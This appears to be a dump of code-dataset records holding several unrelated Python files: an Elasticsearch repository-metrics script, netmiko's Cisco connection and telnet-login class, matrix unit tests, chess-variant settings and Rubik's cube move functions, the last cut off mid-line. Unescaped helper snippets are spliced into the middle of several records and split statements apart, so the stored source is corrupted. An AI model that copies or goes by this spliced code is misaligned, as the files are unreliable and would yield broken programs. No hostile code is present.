S_git()\n\t\t\ts = s.query('range', **{'grimoire_creation_date':{'gt':start_date_str}})\n\t\t\treturn s\n\n\t\tqueries.append((S_git(), 'first_commit_date', 'min', 'commit_date'))\n\t\tqueries.append((S_git(), 'last_commit_date', 'max', 'commit_date'))\n\t\tqueries.append((S_git(), 'num_added', 'sum', 'lines_added'))\n\t\tqueries.append((S_git(), 'num_removed', 'sum', 'lines_removed'))\n\t\tqueries.append((S_git_recent(), 'num_authors', 'cardinality', 'author_uuid'))\n\t\tqueries.append((S_git_recent(), 'num_committers', 'cardinality', 'Commit_uuid'))\n\t\tqueries.append((S_git_recent(), 'num_domains', 'cardinality', 'Author_domain'))\n\t\tqueries.append((S_git_recent(), 'time_to_commit_hours', 'avg', 'time_to_commit_hours'))\n\t\tqueries.append((S_git_recent(), 'num_changed', 'sum', 'lines_changed'))\n\n\t\ts = S_git_recent()\n\t\tresults['num_commits'] = s.count()\n\n\n\t\t#s = S_git()\n\t\t#s = 
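# Round-trip check of the epoch-millisecond helpers at the top of the
# query.py record above (naive datetimes, 1970-01-01 epoch):
import datetime
import dateutil.parser

epoch = dateutil.parser.isoparse('1970-01-01T00:00:00')
ms = 1600000000000
dt = epoch + datetime.timedelta(milliseconds=ms)
print(dt)                                         # 2020-09-13 12:26:40
print((dt - epoch).total_seconds() * 1000 == ms)  # True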
s.query('bool', **{'must_not':{'term':{'author_domain': 'Unknown'}}})\n\t\t#s.aggs.bucket('num_authors_of_domain', 'terms', field = 'author_domain').metric('domain_author_count', 'cardinality', field = 'author_uuid')\n\t\t#s = s.execute()\n\t\t#buckets = s.aggregations.num_authors_of_domain.buckets\n\t\t#domain_author_count = {}\n\t\t#for domain in buckets:\n\t\t#\tdomain_author_count[domain['key']] = domain['domain_author_count']['value']\n\n\tif git_aoc:\n\t\tdef S_aoc():\n\t\t\ts = Search(using=es, index='git-aoc_enriched')\n\t\t\ts = s.query('term', **{'project' : owner_repo})\n\t\t\treturn s\n\n\t\ts = S_aoc()\n\t\ts1 = s.query('term', **{'fileaction':'FILE_A'})\n\t\tnum_added_files = s1.count()\n\t\ts2 = s.query('term', **{'fileaction':'FILE_D'})\n\t\tnum_deleted_files = s2.count()\n\t\tresults['num_files'] = num_added_files - num_deleted_files\n\n\tif git_onion:\n\t\tdef S_git_onion():\n\t\t\ts = Search(using=es, index='git-onion_enriched')\n\t\t\ts = s.query('term', **{'project' : owner_repo})\n\t\t\treturn s\n\n\t\ts = S_git_onion()\n\t\ts.aggs.metric('num_quater', 'cardinality', field = 'grimoire_creation_date')\n\t\ts = s.execute()\n\t\tnum_quater = s.aggregations.num_quater.value\n\n\t\tif num_quater == 0:\n\t\t\tnum_core = num_regular = num_casual = 0\n\t\telse:\n\t\t\ts = S_git_onion()\n\t\t\ts1 = s.query('term', **{'onion_role':'core'})\n\t\t\tnum_core = s1.count() / num_quater\n\n\n\t\t\ts = S_git_onion()\n\t\t\ts2 = s.query('term', **{'onion_role':'regular'})\n\t\t\tnum_regular = s2.count() / num_quater\n\n\n\t\t\ts = S_git_onion()\n\t\t\ts3 = s.query('term', **{'onion_role':'casual'})\n\t\t\tnum_casual = s3.count() / num_quater\n\n\t\tresults['num_core'], results['num_regular'], results['num_casual'] = num_core, num_regular, num_casual\n\n\t# github-issue\n\tif github_issue:\n\t\tdef S_github():\n\t\t\ts = Search(using=es, index='github-issue_enriched')\n\t\t\ts = s.update_from_dict({'query':{'bool': {'must':[\n\t\t\t\t\t\t\t\t\t\t\t{'term' : {'author_bot' : 'false'}},\n\t\t\t\t\t\t\t\t\t\t\t{'term' : {'assignee_data_bot' : 'false'}},\n\t\t\t\t\t\t\t\t\t\t\t{'term' : {'github_repo' : owner_repo}}]}}})\n\t\t\treturn s\n\n\t\tqueries.append((S_github(), 'time_to_first_attention', 'avg', 'time_to_first_attention'))\n\t\tqueries.append((S_github(), 'num_issue_authors', 'cardinality', 'author_uuid'))\n\t\tqueries.append((S_github(), 'num_issue_domains', 'cardinality', 'author_domain'))\n\n\t\tdef S_item_state(state, item_type):\n\t\t\ts = S_github()\n\t\t\ts = s.query('term', **{'state':state})\n\t\t\ts = s.query('term', **{'item_type': item_type})\n\t\t\treturn s\n\n\t\tfield = {'closed': 'time_to_close_days', 'open': 'time_open_days'}\n\t\tnum_item_state = defaultdict(lambda:{})\n\t\ttime_item_state = defaultdict(lambda:{})\n\t\t\n\t\ttransfer = {'issue':'issue', 'pull request':'pr'}\n\t\tfor state in ['closed', 'open']:\n\t\t\tfor item_type in ['issue', 'pull request']:\n\t\t\t\ts = S_item_state(state, item_type)\n\t\t\t\tresults['num_'+state+'_'+transfer[item_type]] = s.count()\n\t\t\t\ts.aggs.metric(field[state], 'avg', field = field[state])\n\t\t\t\ts = s.execute()\n\t\t\t\tresults['time_'+state+'_'+transfer[item_type]] = s.aggregations[field[state]].value\n\t\t\n\t\tfor item_type in ['issue', 'pull request']:\n\t\t\tfor field_name in ['created_at', 'updated_at']:\n\t\t\t\tqueries.append((S_github().query('term', **{'item_type': item_type}), 'last_'+field_name[:8]+transfer[item_type]+'_date', 'max', field_name))\n\n\t#github-repo\n\tif github_repo:\n\t\ts = 
Search(using=es, index='github-repo_raw')\n\t\ts = s.query('term', **{'data.full_name':owner_repo})\n\t\ts = s.execute()\n\t\ts = s[-1]['data']\n\t\tresults['size'] = s['size']\n\t\tresults['num_stars'] = s['stargazers_count']\n\t\tresults['num_forks'] = s['forks_count']\n\t\tresults['num_subscribers'] = s['subscribers_count']\n\t\tresults['num_total_open_issues'] = s['open_issues_count']\n\t\tresults['num_repos'] = s['owner_repos_count'] \n\t\tresults['num_followers'] = s['followers_count']\n\n\n\tfor source, name, function_name, field_name in queries:\n#\t\tprint(source, name, function_name, field_name)\n\t\ts = source\n\t\ts.aggs.metric(name, function_name, field=field_name)\n\t\ts = s.execute()\n\t\tresults[name] = s.aggregations[name].value\n\n\tif git:\n\t\tresults['age'] = datetime.datetime.now().timestamp()*1000 - results['first_commit_date']\n\t\tresults['num_lines'] = results['num_added']- results['num_removed']\n\t\n\n\tif IF_PRINT:\n\t\tprint(results)\n#\t\tprint('Age: ', datetime.timedelta(milliseconds=results['age']).days, 'days')\n#\t\tprint(\"Number of lines: \", results['num_lines'])\n#\t\tprint('Date of the first commit:', milisec2iso(results['first_commit_date']) if results['first_commit_date'] is not None else None)\n#\t\tprint('Date of the latest commit:', milisec2iso(results['last_commit_date']) if results['last_commit_date'] is not None else None)\n#\t\tprint(\"Number of commits: \", results['num_commits'])\n#\t\tprint(\"Number of unique authors: \", results['num_authors'])\n#\t\tprint(\"Number of unique committers: \", results['num_committers'])\n#\t\tprint(\"Number of unique author domains: \", results['num_domains'])\n#\t\tprint(\"Time to commit hours : \", results['time_to_commit_hours'])\n#\t\tprint(\"Number of changed lines: \", results['num_changed'])\n#\t\tprint(\"Number of files: \", results['num_files'])\n#\t\tprint('Number of core member each quater: ', results['num_core'])\n#\t\tprint('Number of regular member each quater: ', results['num_regular'])\n#\t\tprint('Number of casual results member each quater: ', results['num_casual'])\n#\t\tprint('Size of Github: ', results['size'])\n#\t\tprint('Number of stars: ', results['num_stars'])\n#\t\tprint('Number of forks: ', results['num_forks'])\n#\t\tprint('Number of subscribers: ', results['num_subscribers'])\n#\t\tprint('Number of total open issues: ', results['num_total_open_issues'])\n#\t\tprint(\"Time to first attention: \", results['time_to_first_attention'])\n#\t\tprint(\"Number of unique issue authors: \", results['num_issue_authors'])\n#\t\tprint(\"Number of unique issue author domains: \", results['num_issue_domains'])\n#\t\tprint('Date of he latest pull request:', milisec2iso(results['last_created_pr_date']) if results['last_created_pr_date'] is not None else None)\n#\t\tprint('Date of the latest issue:', milisec2iso(results['last_created_issue_date']) if results['last_created_issue_date'] is not None else None)\n#\t\tprint('Number of closed issue: ', results['num_closed_issue'] )\n#\t\tprint('Time of open days for issue: ', results['time_open_issue'] )\n\n\n\tpop_list=['num_added', 'num_removed', 'first_commit_date']\n\tfor name in pop_list:\n\t\tif name in results: \n\t\t results.pop(name)\n\n\treturn results#, domain_author_count\n\ndef get_params_parser():\n \"\"\"Parse command line arguments\"\"\"\n\n parser = argparse.ArgumentParser(add_help=False)\n\n parser.add_argument('-e', '--es_paths', dest='es_paths', nargs='*', required=True,\n help='es')\n parser.add_argument('-o', '--owner_repo', 
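# The (search, name, agg, field) tuples above all funnel through one generic
# metric loop; a standalone sketch of that pattern (the cluster URL and the
# index name are assumptions, not taken from the source):
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search

es = Elasticsearch(['http://localhost:9200'])  # hypothetical cluster
results = {}
for name, agg, field in [('last_commit_date', 'max', 'commit_date'),
                         ('num_authors', 'cardinality', 'author_uuid')]:
    s = Search(using=es, index='git_enriched')
    s.aggs.metric(name, agg, field=field)  # attach one metric aggregation
    results[name] = s.execute().aggregations[name].value
print(results)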
dest='owner_repo', required=True,\n help='owner_repo')\n parser.add_argument('-s', '--start_date_str', dest='start_date_str', default='1970-01-01T00:00:00',\n help='start_date_str')\n parser.add_argument('-c', '--columns', dest='columns', nargs='*', required=True,\n help='columns')\n parser.add_argument('-i', '--IF_PRINT', dest='IF_PRINT', default=False,\n help='IF_PRINT')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n return parser\n\n\ndef get_params():\n \"\"\"Get params to execute query\"\"\"\n\n parser = get_params_parser()\n args = parser.parse_args()\n return args\n\nclass save_result:\n\tdef __init__(self, result_path, lock_path):\n\t\tself.result_path = result_path\n\t\tself.lock_path = lock_path\n\n\tdef append_dict_as_row(self, file_name, dict_of_elem, field_names):\n\t # Open file in append mode\n\t\tlock = FileLock(self.lock_path + file_name + \".lock\")\n\t\twith lock:\n\t\t with open(self.result_path + file_name, 'a+', newline='') as write_obj:\n\t\t # Create a writer object from csv module\n\t\t dict_writer = DictWriter(write_obj, fieldnames=field_names)\n\t\t # Add dictionary as row in the csv\n\t\t dict_writer.writerow(dict_of_elem)\n\n\tdef append_dict_to_json(self, file_name, dict_of_elem):\n\t\tlock = FileLock(self.lock_path + file_name + \".lock\")\n\t\twith lock:\n\t\t\twith open(self.result_path + file_name, \"r+\") as file:\n\t\t\t\tjson_data = json.load(file)\n\t\t\t\tjson_data.update(dict_of_elem)\n\t\t\t\tfile.seek(0)\n\t\t\t\tjson.dump(json_data, file, indent=4)\n\n\tdef append_line(self, file_name, line):\n\t\tlock = FileLock(self.lock_path + file_name + \".lock\")\n\t\twith lock:\n\t\t\twith open(self.result_path + file_name, \"a\") as file:\n\t\t\t\tfile.write(line + '\\n')\n\n\ndef remove_settings(es, new_owner_repo):\n\t# es.indices.delete(index='git_raw', ignore=[400, 404])\n\t# es.indices.delete(index='github-issue_raw', ignore=[400, 404])\n\t# es.indices.delete(index='github-repo_enriched', ignore=[400, 404])\n\tos.remove('settings/projects/project_' + new_owner_repo + '.json')\n\tos.remove('settings/setups/setup_'+ new_owner_repo +'.cfg')\n\ndef run(owner_repo, start_date_str, columns):\n\tes = Elasticsearch(ES_PATHS)\n\n\tdata = query(es, owner_repo, start_date_str)\n\n\tsave_result_obj = save_result(result_path = 'result/', lock_path = 'lock/')\n\tsave_result_obj.append_dict_as_row('data.csv', data, columns)\n\t#save_result_obj.append_dict_to_json('domain_author_count.json', {owner_repo : domain_author_count})\n\n\tnew_owner_repo = set_params.replace_name(owner_repo)\n\tremove_settings(es, new_owner_repo)\n\nif __name__ == '__main__':\n\targs = get_params()\n\tes = Elasticsearch(args.es_paths)\n\t\n\tnew_owner_repo = set_params.replace_name(args.owner_repo)\n\t\n\tdata = query(es, args.owner_repo, args.start_date_str)\n\n\tsave_result_obj = save_result(result_path = 'result/', lock_path = 'lock/')\n\tsave_result_obj.append_dict_as_row('data.csv', data, args.columns)\n\t#save_result_obj.append_dict_to_json('domain_author_count.json', {args.owner_repo : domain_author_count})\n\n\tnew_owner_repo = set_params.replace_name(args.owner_repo)\n\tremove_settings(es, new_owner_repo)\n\n#\tIF_PRINT = True\n#\tfor repo in ['git-up/GitUp']:\n# \t\tquery(Elasticsearch(ES_PATHS), repo,'2020-01-01')\n\n# print(query('chaoss/grimoirelab','2020-03-30',True).keys())\n# a = \"size, age, num_lines, num_files, num_stars, num_forks, num_subscribers, num_total_open_issues, num_core, num_regular, num_casual, \\\n# \tnum_commits, num_authors, num_committers, num_domains, num_changed, num_closed_issue, num_closed_pr, 
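# The save_result class above serializes concurrent CSV appends through a
# file lock; the core pattern in isolation (paths and field names here are
# invented placeholders):
from csv import DictWriter
from filelock import FileLock

row = {'owner_repo': 'octo/repo', 'num_commits': 42}
with FileLock('result/data.csv.lock'):
    with open('result/data.csv', 'a+', newline='') as fh:
        DictWriter(fh, fieldnames=['owner_repo', 'num_commits']).writerow(row)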
num_open_issue, num_open_pr, \\\n# \tlast_commit_date, last_pr_date, last_issue_date, time_to_commit_hours, time_to_first_attention, time_to_close_days_issue, time_to_close_days_pr, time_open_days_issue, time_open_days_pr\"\n# a = a.replace('\\t', '')\n# # b = a.replace(\"['issue']\", \"_issue\").replace(\"['pull request']\", \"_pr\")\n# b = a.split(', ')\n# print(b)\\\n","repo_name":"Julianbaozi/github-repository-importance","sub_path":"query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":12781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34058518190","text":"\"\"\"CiscoBaseConnection is netmiko SSH class for Cisco and Cisco-like platforms.\"\"\"\nfrom typing import Optional\nimport re\nimport time\nfrom netmiko.base_connection import BaseConnection\nfrom netmiko.scp_handler import BaseFileTransfer\nfrom netmiko.exceptions import NetmikoAuthenticationException\n\n\nclass CiscoBaseConnection(BaseConnection):\n \"\"\"Base Class for cisco-like behavior.\"\"\"\n\n def check_enable_mode(self, check_string: str = \"#\") -> bool:\n \"\"\"Check if in enable mode. Return boolean.\"\"\"\n return super().check_enable_mode(check_string=check_string)\n\n def enable(\n self,\n cmd: str = \"enable\",\n pattern: str = \"ssword\",\n enable_pattern: Optional[str] = None,\n check_state: bool = True,\n re_flags: int = re.IGNORECASE,\n ) -> str:\n \"\"\"Enter enable mode.\"\"\"\n return super().enable(\n cmd=cmd,\n pattern=pattern,\n enable_pattern=enable_pattern,\n check_state=check_state,\n re_flags=re_flags,\n )\n\n def exit_enable_mode(self, exit_command: str = \"disable\") -> str:\n \"\"\"Exits enable (privileged exec) mode.\"\"\"\n return super().exit_enable_mode(exit_command=exit_command)\n\n def check_config_mode(\n self, check_string: str = \")#\", pattern: str = \"\", force_regex: bool = False\n ) -> bool:\n \"\"\"Checks if the device is in configuration mode or not.\"\"\"\n return super().check_config_mode(\n check_string=check_string, pattern=pattern, force_regex=force_regex\n )\n\n def config_mode(\n self,\n config_command: str = \"configure terminal\",\n pattern: str = \"\",\n re_flags: int = 0,\n ) -> str:\n return super().config_mode(\n config_command=config_command, pattern=pattern, re_flags=re_flags\n )\n\n def exit_config_mode(self, exit_config: str = \"end\", pattern: str = r\"#.*\") -> str:\n \"\"\"Exit from configuration mode.\"\"\"\n return super().exit_config_mode(exit_config=exit_config, pattern=pattern)\n\n def serial_login(\n self,\n pri_prompt_terminator: str = r\"\\#\\s*$\",\n alt_prompt_terminator: str = r\">\\s*$\",\n username_pattern: str = r\"(?:user:|username|login)\",\n pwd_pattern: str = r\"assword\",\n delay_factor: float = 1.0,\n max_loops: int = 20,\n ) -> str:\n self.write_channel(self.TELNET_RETURN)\n output = self.read_channel()\n if re.search(pri_prompt_terminator, output, flags=re.M) or re.search(\n alt_prompt_terminator, output, flags=re.M\n ):\n return output\n else:\n return self.telnet_login(\n pri_prompt_terminator,\n alt_prompt_terminator,\n username_pattern,\n pwd_pattern,\n delay_factor,\n max_loops,\n )\n\n def telnet_login(\n self,\n pri_prompt_terminator: str = r\"\\#\\s*$\",\n alt_prompt_terminator: str = r\">\\s*$\",\n username_pattern: str = r\"(?:user:|username|login|user name)\",\n pwd_pattern: str = r\"assword\",\n delay_factor: float = 1.0,\n max_loops: int = 20,\n ) -> str:\n \"\"\"Telnet login. 
Can be username/password or just password.\"\"\"\n delay_factor = self.select_delay_factor(delay_factor)\n\n if delay_factor < 1:\n if not self._legacy_mode and self.fast_cli:\n delay_factor = 1\n\n time.sleep(1 * delay_factor)\n\n output = \"\"\n return_msg = \"\"\n outer_loops = 3\n inner_loops = int(max_loops / outer_loops)\n i = 1\n for _ in range(outer_loops):\n while i <= inner_loops:\n try:\n output = self.read_channel()\n return_msg += output\n\n # Search for username pattern / send username\n if re.search(username_pattern, output, flags=re.I):\n # Sometimes username/password must be terminated with \"\\r\" and not \"\\r\\n\"\n self.write_channel(self.username + \"\\r\")\n time.sleep(1 * delay_factor)\n output = self.read_channel()\n return_msg += output\n\n # Search for password pattern / send password\n if re.search(pwd_pattern, output, flags=re.I):\n # Sometimes username/password must be terminated with \"\\r\" and not \"\\r\\n\"\n assert isinstance(self.password, str)\n self.write_channel(self.password + \"\\r\")\n time.sleep(0.5 * delay_factor)\n output = self.read_channel()\n return_msg += output\n if re.search(\n pri_prompt_terminator, output, flags=re.M\n ) or re.search(alt_prompt_terminator, output, flags=re.M):\n return return_msg\n\n # Support direct telnet through terminal server\n if re.search(\n r\"initial configuration dialog\\? \\[yes/no\\]: \", output\n ):\n self.write_channel(\"no\" + self.TELNET_RETURN)\n time.sleep(0.5 * delay_factor)\n count = 0\n while count < 15:\n output = self.read_channel()\n return_msg += output\n if re.search(r\"ress RETURN to get started\", output):\n output = \"\"\n break\n time.sleep(2 * delay_factor)\n count += 1\n\n # Check for device with no password configured\n if re.search(r\"assword required, but none set\", output):\n assert self.remote_conn is not None\n self.remote_conn.close()\n msg = (\n \"Login failed - Password required, but none set: {}\".format(\n self.host\n )\n )\n raise NetmikoAuthenticationException(msg)\n\n # Check if proper data received\n if re.search(\n pri_prompt_terminator, output, flags=re.M\n ) or re.search(alt_prompt_terminator, output, flags=re.M):\n return return_msg\n\n i += 1\n\n except EOFError:\n assert self.remote_conn is not None\n self.remote_conn.close()\n msg = f\"Login failed: {self.host}\"\n raise NetmikoAuthenticationException(msg)\n\n # Try sending an to restart the login process\n self.write_channel(self.TELNET_RETURN)\n time.sleep(0.5 * delay_factor)\n i = 1\n\n # Last try to see if we already logged in\n self.write_channel(self.TELNET_RETURN)\n time.sleep(0.5 * delay_factor)\n output = self.read_channel()\n return_msg += output\n if re.search(pri_prompt_terminator, output, flags=re.M) or re.search(\n alt_prompt_terminator, output, flags=re.M\n ):\n return return_msg\n\n assert self.remote_conn is not None\n self.remote_conn.close()\n msg = f\"Login failed: {self.host}\"\n raise NetmikoAuthenticationException(msg)\n\n def cleanup(self, command: str = \"exit\") -> None:\n \"\"\"Gracefully exit the SSH session.\"\"\"\n try:\n if self.check_config_mode():\n self.exit_config_mode()\n except Exception:\n pass\n # Always try to send final 'exit' (command)\n if self.session_log:\n self.session_log.fin = True\n self.write_channel(command + self.RETURN)\n\n def _autodetect_fs(\n self, cmd: str = \"dir\", pattern: str = r\"Directory of (.*)/\"\n ) -> str:\n \"\"\"Autodetect the file system on the remote device. 
Used by SCP operations.\"\"\"\n if not self.check_enable_mode():\n raise ValueError(\"Must be in enable mode to auto-detect the file-system.\")\n output = self._send_command_str(cmd)\n match = re.search(pattern, output)\n if match:\n file_system = match.group(1)\n # Test file_system\n cmd = f\"dir {file_system}\"\n output = self._send_command_str(cmd)\n if \"% Invalid\" in output or \"%Error:\" in output:\n raise ValueError(\n \"An error occurred in dynamically determining remote file \"\n \"system: {} {}\".format(cmd, output)\n )\n else:\n return file_system\n\n raise ValueError(\n \"An error occurred in dynamically determining remote file \"\n \"system: {} {}\".format(cmd, output)\n )\n\n def save_config(\n self,\n cmd: str = \"copy running-config startup-config\",\n confirm: bool = False,\n confirm_response: str = \"\",\n ) -> str:\n \"\"\"Saves Config.\"\"\"\n self.enable()\n if confirm:\n output = self._send_command_timing_str(\n command_string=cmd, strip_prompt=False, strip_command=False\n )\n if confirm_response:\n output += self._send_command_timing_str(\n confirm_response, strip_prompt=False, strip_command=False\n )\n else:\n # Send enter by default\n output += self._send_command_timing_str(\n self.RETURN, strip_prompt=False, strip_command=False\n )\n else:\n # Some devices are slow so match on trailing-prompt if you can\n output = self._send_command_str(\n command_string=cmd,\n strip_prompt=False,\n strip_command=False,\n read_timeout=100.0,\n )\n return output\n\n\nclass CiscoSSHConnection(CiscoBaseConnection):\n pass\n\n\nclass CiscoFileTransfer(BaseFileTransfer):\n pass\n","repo_name":"ktbyers/netmiko","sub_path":"netmiko/cisco_base_connection.py","file_name":"cisco_base_connection.py","file_ext":"py","file_size_in_byte":10259,"program_lang":"python","lang":"en","doc_type":"code","stars":3278,"dataset":"github-code","pt":"21"} +{"seq_id":"22611032206","text":"'''\nCreated on 28 Jul 2017\n\n@author: julianporter\n'''\nimport unittest\nfrom .baseTest import TestFramework\nfrom .types import equalMatrices, equalVectors, vectorDiff, matrixDiff\nimport numpy as np\nfrom OSGridConverter.cartesian import ExactTransform, Matrix\n\n\n\n\nclass TestVectorEquality(TestFramework):\n \n testName='vector creation'\n \n def action(self):\n np, v=self.generator.randomVectorPair()\n if equalVectors(np, v): return 1\n else: return 0\n\nclass TestVectorNegation(TestFramework):\n \n testName='vector negation'\n \n def action(self):\n\n np, v=self.generator.randomVectorPair()\n if equalVectors(-np, -v): return 1\n else: return 0\n \nclass TestDotProduct(TestFramework):\n \n testName='dot product'\n \n def action(self):\n np1, v1=self.generator.randomVectorPair()\n np2, v2=self.generator.randomVectorPair()\n if np.dot(np1,np2) == v1 | v2 : return 1\n else: return 0\n \nclass TestVectorSum(TestFramework):\n \n testName='vector sum'\n \n def action(self):\n np1, v1=self.generator.randomVectorPair()\n np2, v2=self.generator.randomVectorPair()\n if equalVectors(np1+np2,v1+v2) : return 1\n else: return 0\n \nclass TestMatrixSum(TestFramework):\n \n testName='matrix sum'\n \n def action(self):\n np1, v1=self.generator.randomMatrixPair()\n np2, v2=self.generator.randomMatrixPair()\n if equalMatrices(np1+np2,v1+v2) : return 1\n else: return 0\n \nclass TestMatrixVectorProduct(TestFramework):\n \n testName='matrix vector product'\n \n def action(self):\n np1, v1=self.generator.randomMatrixPair()\n np2, v2=self.generator.randomVectorPair()\n pr1 = np1@np2\n pr2 = v1@v2\n e=vectorDiff(pr1, pr2)\n return 
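# The CiscoBaseConnection machinery above is normally reached through
# netmiko's ConnectHandler; the host and credentials below are placeholders:
from netmiko import ConnectHandler

device = {
    'device_type': 'cisco_ios',
    'host': '192.0.2.1',
    'username': 'admin',
    'password': 'secret',
}
with ConnectHandler(**device) as conn:
    conn.enable()                             # enter privileged exec mode
    print(conn.send_command('show version'))
    conn.save_config()                        # copy running-config startup-config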
self.push(e)\n \nclass TestMatrixMatrixProduct(TestFramework):\n \n testName='matrix matrix product'\n \n def action(self):\n np1, v1=self.generator.randomMatrixPair()\n np2, v2=self.generator.randomMatrixPair()\n pr1 = np.transpose(np1@np2)\n pr2 = v1@v2\n e=matrixDiff(pr1, pr2)\n return self.push(e)\n \nclass TestHelmertInversion(unittest.TestCase):\n \n testName='Helmert matrix inversion'\n \n def setUp(self):\n super(TestHelmertInversion,self).setUp()\n self.i3=Matrix.identity(n=3)\n \n def action(self):\n t=self.generator.randomList()\n r=self.generator.randomList()\n s=self.generator.randomScalar()\n h=ExactTransform(t,r,s).mx\n i=h.inverse()\n pr1 = h@i\n e= matrixDiff(pr1, self.i3)\n return self.push(e)\n \n\nif __name__ == \"__main__\":\n #import sys;sys.argv = ['', 'Test.testName']\n unittest.main()","repo_name":"jdstmporter/OSGridConverter","sub_path":"python/test/test_algebra.py","file_name":"test_algebra.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"16408701808","text":"impassable_squares = [\n 'vanilla:border',\n 'vanilla:border1',\n 'vanilla:border2',\n 'vanilla:border2',\n 'vanilla:border3',\n 'vanilla:border4',\n 'vanilla:border5',\n 'vanilla:border6',\n 'vanilla:border7',\n 'vanilla:border8',\n 'vanilla:border9',\n\n 'vanilla:wall',\n 'vanilla:wall1',\n 'vanilla:wall2',\n 'vanilla:wall3',\n 'vanilla:wall4',\n 'vanilla:wall5',\n 'vanilla:wall6',\n 'vanilla:wall7',\n 'vanilla:wall8',\n 'vanilla:wall9',\n\n ]\nimjumpable_squares = impassable_squares[:]\n\n\ntmp_texture_pack_directory = './tmp_texture_pack'\ntexture_error_path = './texture_packs/vanilla/squares/vanilla:texture_error.png'\n\n\nfrom piece import Piece\nfrom piece_packs.vanilla.vanilla_wazir import VanillaWazir\nfrom piece_packs.vanilla.vanilla_chesspawn import VanillaChessPawn\nfrom piece_packs.vanilla.vanilla_rook import VanillaRook\nfrom piece_packs.vanilla.vanilla_bishop import VanillaBishop\nfrom piece_packs.vanilla.vanilla_queen import VanillaQueen\nfrom piece_packs.vanilla.vanilla_knight import VanillaKnight\nfrom piece_packs.vanilla.vanilla_king import VanillaKing\nglobal_piece_dict = {\n 'vanilla:wazir': VanillaWazir,\n 'vanilla:chesspawn': VanillaChessPawn,\n 'vanilla:rook': VanillaRook,\n 'vanilla:bishop': VanillaBishop,\n 'vanilla:queen': VanillaQueen,\n 'vanilla:knight': VanillaKnight,\n 'vanilla:king': VanillaKing,\n }\n\nfrom player_packs.vanilla.vanilla_classic_ai import VanillaClassicAI\nfrom player_packs.vanilla.vanilla_player import VanillaPlayer\nglobal_player_dict = {\n 'vanilla:classic_ai': VanillaClassicAI,\n 'vanilla:player': VanillaPlayer\n }\n\nVANILLA_PLAYER = 'vanilla:player'\n\nplayers_dict = dict()\nplayers_list = list(players_dict)\ncurrent_player_id = -1\ncurrent_player_color = 0\ncurrent_player_class = 0\n","repo_name":"zubakker/Chessmonster","sub_path":"vanilla_settings.py","file_name":"vanilla_settings.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74754133171","text":"from ressources import *\r\nfrom graphic_interpreter import*\r\n\r\n\r\n\r\ndef right_prime(arretes, coins):\r\n A = coins[0]\r\n A[0], A[1], A[2] = A[0], A[2], A[1]\r\n coins[0] = A\r\n A = coins[1]\r\n A[0], A[1], A[2] = A[0], A[2], A[1]\r\n coins[1] = A\r\n A = coins[2]\r\n A[0], A[1], A[2] = A[0], A[2], A[1]\r\n coins[2] = A\r\n A = coins[3]\r\n A[0], A[1], A[2] = A[0], A[2], A[1]\r\n coins[3] 
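# Each quarter-turn above is a 4-cycle of pieces with self-inverse
# orientation twists, so applying right_prime four times should restore any
# state; a property check using an invented solved state (assumes the move
# functions above are in scope):
import copy

arretes0 = [[i, i + 100] for i in range(12)]        # 12 edges, 2 stickers each
coins0 = [[i, i + 100, i + 200] for i in range(8)]  # 8 corners, 3 stickers each
arretes, coins = copy.deepcopy(arretes0), copy.deepcopy(coins0)
for _ in range(4):
    arretes, coins = right_prime(arretes, coins)
print(arretes == arretes0 and coins == coins0)  # expect True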
= A\r\n coins[0],coins[1], coins[2], coins[3] = coins[1], coins[3], coins[0], coins[2]\r\n arretes[0], arretes[1], arretes[2], arretes[3] = arretes[3], arretes[2], arretes[0], arretes[1]\r\n return (arretes,coins)\r\n\r\n\r\ndef right(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = right_prime(arretes, coins)\r\n return arretes, coins\r\n\r\n\r\ndef left_prime(arretes , coins):\r\n coins_cinq = coins[4]\r\n coins_cinq[0], coins_cinq[1], coins_cinq[2] = coins_cinq[0], coins_cinq[2], coins_cinq[1]\r\n coins[4] = coins_cinq\r\n coins_six = coins[5]\r\n coins_six[0], coins_six[1], coins_six[2] = coins_six[0], coins_six[2], coins_six[1]\r\n coins[5]=coins_six\r\n coins_sept = coins[6]\r\n coins_sept[0], coins_sept[1], coins_sept[2] = coins_sept[0], coins_sept[2], coins_sept[1]\r\n coins[6] = coins_sept\r\n coins_huit = coins[7]\r\n coins_huit[0], coins_huit[1], coins_huit[2] = coins_huit[0], coins_huit[2], coins_huit[1]\r\n coins[4], coins[5], coins[6], coins[7] = coins[6], coins[4], coins[7], coins[5]\r\n arretes[4], arretes[5], arretes[6], arretes[7] = arretes[6], arretes[7], arretes[5], arretes[4]\r\n return (arretes,coins)\r\n\r\n\r\ndef left(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = left_prime(arretes, coins)\r\n return(arretes , coins)\r\n\r\n\r\ndef up_prime(arretes, coins):\r\n liste_coins = [0,1,4,5]\r\n liste_arretes = [0,4,8,9]\r\n #coins\r\n for i in liste_coins:\r\n coins_1_2_5_6 = coins[i]\r\n coins_1_2_5_6[0], coins_1_2_5_6[1], coins_1_2_5_6[2] = coins_1_2_5_6[2], coins_1_2_5_6[1], coins_1_2_5_6[0]\r\n coins[i] = coins_1_2_5_6\r\n coins[0], coins[1], coins[4], coins[5] = coins[4], coins[0], coins[5], coins[1]\r\n for j in liste_arretes:\r\n arretes_1_5_9_10 = arretes[j]\r\n arretes_1_5_9_10[0], arretes_1_5_9_10[1] = arretes_1_5_9_10[1], arretes_1_5_9_10[0]\r\n arretes[j] = arretes_1_5_9_10\r\n arretes[0], arretes[4], arretes[8], arretes[9] = arretes[8], arretes[9], arretes[4], arretes[0]\r\n return (arretes,coins)\r\n\r\n\r\ndef up(arretes, coins):\r\n for i in range(0,3):\r\n arretes, coins = up_prime(arretes, coins)\r\n return arretes, coins\r\n\r\n\r\ndef down(arretes,coins):\r\n liste_coins=[2,3,6,7]\r\n liste_arretes=[1,5,10,11]\r\n for i in liste_coins:\r\n coins_trois_quatre_sept_huit = coins[i]\r\n coins_trois_quatre_sept_huit[0], coins_trois_quatre_sept_huit[1], 